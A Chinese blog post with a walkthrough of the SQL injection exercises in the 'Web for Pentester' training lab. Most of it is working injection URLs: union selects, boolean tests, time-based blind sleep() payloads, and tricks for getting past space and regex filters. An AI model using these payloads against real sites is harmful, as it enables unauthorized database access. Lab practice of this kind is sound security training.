【渗透测试学习平台】 web for pentester -2.SQL注入

最新推荐文章于 2023-02-17 09:55:51 发布
最新推荐文章于 2023-02-17 09:55:51 发布
阅读量581 收藏
点赞数
分类专栏: 【渗透测试】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/81256114
版权

Example 1

字符类型的注入,无过滤

http://192.168.91.139/sqli/example1.php?name=root 

http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23

http://192.168.91.139/sqli/example1.php?name=root' and 1=2%23

http://192.168.91.139/sqli/example1.php?name=root' union select 1,2,3,4,5%23

 

Example 2

与example1差不多,过滤了空格,语句中存现空格就会报错

mysql注入绕过空格过滤的方法:

1、水平制表(HT) url编码:%09

2、注释绕过空格   /*注释*/

3、括号绕过空格的方法,在time based盲注中

        index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) 

特点:1) 既没有用到逗号、大小于符号 2) 也没有使用空格 却可以完成数据的猜解工作!

 

http://192.168.91.139/sqli/example2.php?name=root'%09and%091=1%23

http://192.168.91.139/sqli/example2.php?name=root'%09and%091=2%23

http://192.168.91.139/sqli/example2.php?name=root'/**/union/**/select/**/1,2,3,4,5%23

 

Example 3

在example的基础上,\s匹配任何空白字符,包括空格、制表符、换页符等,全部过滤掉

可以使用example2中 /*注释*/ 绕过过滤

http://192.168.91.139/sqli/example3.php?name=root'/**/union/**/select/**/1,2,3,4,5%23

 

Example 4

数值型的注入,过滤了单引号等,对数值型无效

http://192.168.91.139/sqli/example4.php?id=3 union select 1,2,3,4,5

 

Example 5

与前面类似,以一个数字开头的,后面可添加构造的sql语句进行攻击测试

http://192.168.91.139/sqli/example5.php?id=2 and 1=1--

http://192.168.91.139/sqli/example5.php?id=2 and 1=2--

 

Example 6

正则表达式值确保了参数id是以一个数字结尾的.他不能确保id参数的开头是合法的.

你可以变通一下前面说到的检测方法.你只需要在你的payload后面加上数字.比如你可以这样:1 or 1=1 # 123. 

http://192.168.91.139/sqli/example6.php?id=2 union select 1,2,3,4,5 %23 123

 

 

Example 7

解法一:

换行 \n的url编码是%0a

 这边纠结了好久,最终使用了-- %23 才能注释掉后面语句

http://192.168.91.139/sqli/example7.php?id=2 and if(ascii(substring(user(),1,1))=112,sleep(1),0)--%23%0a123

 

解法二:

http://192.168.91.139/sqli/example7.php?id=' and 1=1 %0a1%0a' union select version(),2,3,4,5 %23

Example 8

order by `name`   报错注入出不来,用了时间盲注一个一个猜解

http://192.168.91.139/sqli/example8.php
?order=name` xor if(ascii(substring(user(),1,1))=111,sleep(5),0)%23

 

Example 9

 与 example8类似,可以通过时间盲注进行逐一猜解

http://192.168.91.139/sqli/example9.php?order=1 xor if(ascii(substring(user(),1,1))=112,sleep(5),0)%23

 

参考链接:

Web for Pentester II  :https://pentesterlab.com/exercises/web_for_pentester/course

Web渗透测试攻略 [三]: http://www.2cto.com/Article/201401/275482.html

Web渗透测试攻略[四]:http://www.tuicool.com/articles/EFV3UzF

Web渗透测试攻略[五]:http://www.tuicool.com/articles/Iza63eM

Bypass--
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web for Pentester 阅读笔记(2)
kezhen的专栏
06-07 2425
HTTP协议 HTTP是Web的基本协议,对该
Web For Pentester 阅读笔记(3)
kezhen的专栏
06-07 2357
HTTP Responses 当用户发送一个请求时,服务器会返回HTTP 响应。例如
Web for Pentester II安装时网络模式选择
beta_safe的博客
02-17 184
物理机一直访问不了Web for Pentester II虚拟机环境,偶然参考以下内容,把虚拟机设置为桥接模式,竟然就搞定了!如果物理机是自动分配,就说明物理机本身处于子网(如IP为192.168.*.*),那可以选用桥接方式,虚拟机设为同网段的一个未用IP。如果物理机为固定MAC绑定IP,那就用NAT模式,虚拟机也选用DHCP自动分配。...
Web for Pentester II练习题解
Shinpachi8的博客
01-14 2270
最近一直在找mongodb的注入练习,结果在penetsterlab上找到了。发现了其中的web for pentester 2, 其实我并没有做过第一版。有兴趣同学可以试着做做这一套练习包括:SQL注入,认证,授权,验证码, 覆盖属性,随机数问题,mongodb注入几部分。其中除随机数没有做出来,其他的都有解法。在pentesterlab上下载iso镜像直接用在虚拟机打开就可以了。我用的是virtualbox。
Web for pentester_writeup之SQL injections篇
ditanji3425的博客
08-07 385
Web for pentester_writeup之SQL injections篇 SQL injections(SQL注入) Example 1 测试参数,添加 and '1'='1, 'and '1'='2判断存在注入 猜解查询列数(%23为#号的URL编码,注释原有结构的单引号 http://192.168.219.136/sqli/example1.php?name=roo...
sql注入判断技巧
u012080723的专栏
12-01 567
对于数值型: 1.常用的一条time based盲注语句:     http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) 这条语句是猜解user()第二个字符的ascii码是不是109,若是109,则页面加载将延迟。它: 1) 既没有用到逗号、大小于符号 2) 也没有使用空格 却可以
ATTCK-PenTester-Book-master.zip
09-08
ATT&CK 中文手册 一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege ...八、lateral-movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取)
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web_for_pentester.zip
11-26
web_for_pentester
使用Burpsuite精通Web渗透测试-英文版 非常好
05-20
使用Burpsuite精通Web渗透测试,英文版,原汁原味! 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者。 Get hands-on experience of using Burp Suite to execute ...
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
WEB渗透测试平台
07-06
链接:https://pan.baidu.com/s/1QFrJeL6tq5iaf8AfXxYJCw 提取码:dm1v 自己集成的测试平台,供同行使用。集成的平台所有权归原作者所有,致以感谢。 包括: 技术参考 OWASP sql注入资料 w3schoo/runoob/linux等网站 metasploit TCP/IP等学习和参考资料。 集成平台 DVWA multilidae MCIR sqli-labs pikachu BWVS btslab xssplatform phpMyAdmin blueLotus 推荐书籍 各种参考详细书目。 因涉及产权以上仅提供WEB测试平台,书籍不提供。 有问题请留言。
Web for Pentester SQL注入example 1-7 答案解析
u011975363的专栏
04-16 5029
pentester lab镜像下载地址为https://pentesterlab.com/exercises/web_for_pentester/course,下载.iso镜像,在虚拟机中搭建,查看虚拟机ip,在浏览器中输入虚拟机Ip,即可看到练习题界面,sql注入的界面如图所示: 一、example 1 1、首先判断是否存在注入点及注入类型 由此可知,存在字符型注入,且没有设置...
渗透测试学习平台web for pentester -6.命令执行
07-21 1095
  命令执行漏洞 windows支持: |           ping 127.0.0.1|whoami           ||              ping  2 || whoami (哪条名令为真执行那条) &  &&   ping 127.0.0.1&&whoami Linux支持: ;      127.0.0.1;whoami...
PentesterLab渗透演练平台
weixin_33695450的博客
04-02 868
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html web for pentester是国外安全研究者开发的的一款web渗透测试平台(环境) 通过该平台你可以了解到常见的Web漏洞检测技术。 1、什么是WebAp...
web for pentester介绍与安装
Jone_Dom的博客
04-24 6356
web for pentester 本篇介绍的是web脚本漏洞演练平台 Web for Pentester,在国外web for pentester很受欢迎,很多人都用这个靶场来锻炼自己的web安全技术。只要懂点技术,就可以很快地上手,比较基础。特意写一篇详细使用教程,希望能帮到更多好安全小白! 下载Pentester ISO镜像 下载地址:web for pentester ISO镜像 安装: ...
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1402
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
Web For Pentester 第八关分析
最新发布
06-07
<title>Web for Pentester <meta charset="UTF-8"> <h1 align="center">Welcome to Web for Pentester <img src="8.jpg" alt="web for pentester"> <form method="post" action="index.php"> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值